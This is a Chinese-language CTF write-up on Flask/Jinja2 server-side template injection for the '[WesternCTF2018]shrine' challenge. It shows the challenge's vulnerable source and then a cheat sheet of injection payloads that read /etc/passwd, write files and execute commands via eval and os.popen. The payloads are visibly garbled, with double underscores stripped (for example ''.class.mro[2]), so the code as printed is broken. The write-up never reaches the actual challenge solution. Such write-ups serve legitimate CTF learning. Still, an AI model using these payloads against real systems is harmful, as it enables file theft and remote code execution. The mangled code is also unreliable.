flask之ssti [WesternCTF2018]shrine1

打开题目

整理一下,代码:

import flask
import os

app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
@app.route('/')

def index():
    return open(__file__).read()
           @app.route('/shrine/')

def shrine(shrine):
    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
    return flask.render_template_string(safe_jinja(shrine))
if __name__ == '__main__':
    app.run(debug=True)

知识点:

1.ssti的漏洞实质

实质就是服务器端接受了用户的输入,没有经过过滤或者说过滤不严谨,将用户输入作为web应用模板的一部分,但是在进行编译渲染的过程中,执行了用户输入的恶意代码,造成信息泄露,代码执行,getshell等问题

2.flask的一些特性

flask有两种渲染方式,render_template() 和 render_template_string()。

render_template()是渲染文件的,render_template_string是渲染字符串的

使用{ { }}作为变量包裹标识符;

快速查找该引用对应的位置:

''.class.mro[2].subclasses().index(file)
文件读写:

''.class.mro[2].subclasses()[40]

//读取文件

''.class.mro[2].subclasses()[59].init.globals['builtins']['file']("/etc/passwd").read()

''.class.mro[2].subclasses()[40]("/etc/passwd").read()

将read()改为write()就可以进行写操作:

''.class.mro[2].subclasses()[40]("/root/桌面/test.txt", "a").write("123")

复制代码

命令执行

1.利用eval进行命令执行

''.class.mro[2].subclasses()[59].init.globals['builtins']['eval']('import("os").popen("whoami").read()')

2.利用commands实现命令执行

[].class.base.subclasses()[59].init.globals['linecache'].dict.values()[12].dict.values()[144]('whoami')}

{}.class.bases[0].subclasses()[59].init.globals['builtins']['import']('os').popen('whoami').read()

直接将这些payload放入{ {}}中作为变量执行即可获得想要的结果

知识点参考文章:

关于flask的SSTI注入[通俗易懂]-腾讯云开发者社区-腾讯云

flask模板注入(ssti),一篇就够了_flask"+"ssti"+"总结-CSDN博客

相关推荐
我的K84092 分钟前
Spring Boot基本项目结构
java·spring boot·后端
CodeClimb1 小时前
【华为OD-E卷 - 最大矩阵和 100分(python、java、c++、js、c)】
java·c++·python·华为od·矩阵
慕璃嫣1 小时前
Haskell语言的多线程编程
开发语言·后端·golang
晴空๓1 小时前
Spring Boot项目如何使用MyBatis实现分页查询
spring boot·后端·mybatis
aiweker3 小时前
Selenium 使用指南:从入门到精通
python·selenium·测试工具
SteveKenny4 小时前
Python 梯度下降法(六):Nadam Optimize
开发语言·python
Hello.Reader5 小时前
深入浅出 Rust 的强大 match 表达式
开发语言·后端·rust
dreadp6 小时前
解锁豆瓣高清海报(二) 使用 OpenCV 拼接和压缩
图像处理·python·opencv·计算机视觉·数据分析
Tester_孙大壮6 小时前
第32章 测试驱动开发(TDD)的原理、实践、关联与争议(Python 版)
驱动开发·python·tdd